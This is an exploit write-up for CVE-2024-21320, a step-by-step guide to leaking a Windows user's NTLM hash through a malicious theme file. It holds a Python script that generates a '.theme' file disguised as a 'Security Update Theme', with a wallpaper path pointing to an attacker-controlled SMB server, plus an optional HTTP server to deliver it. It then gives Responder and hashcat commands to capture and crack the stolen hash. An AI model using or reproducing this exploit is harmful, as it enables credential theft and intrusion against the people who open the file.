# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
## Step 1: Install Responder
Responder is a tool to capture NTLM hashes over SMB.
git clone https://github.com/lgandx/Responder.git
cd Responder
Replace `eth0` with your network interface.
## Step 2: Create a Malicious Windows Theme File
### Python Script to Generate the Malicious `.theme` File
import os
# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100" # Change this to your attacker's IP
# Name of the malicious theme file
theme_filename = "malicious.theme"
# Malicious .theme file content
theme_content = f"""
[Theme]
DisplayName=Security Update Theme
[Control Panel\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""
# Write the theme file
with open(theme_filename, "w") as theme_file:
theme_file.write(theme_content)
print(f"[+] Malicious theme file '{theme_filename}' created.")
# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n):
").strip().lower()
if start_http == "y":
print("[+] Starting HTTP server on port 8080...")
os.system("python3 -m http.server 8080")
```
## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:
sudo python3 Responder.py -I eth0
3. Wait for the victim to open the `.theme` file.
4. Extract NTLM hash from Responder logs and crack it using hashcat:
hashcat -m 5600 captured_hashes.txt rockyou.txt
--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University
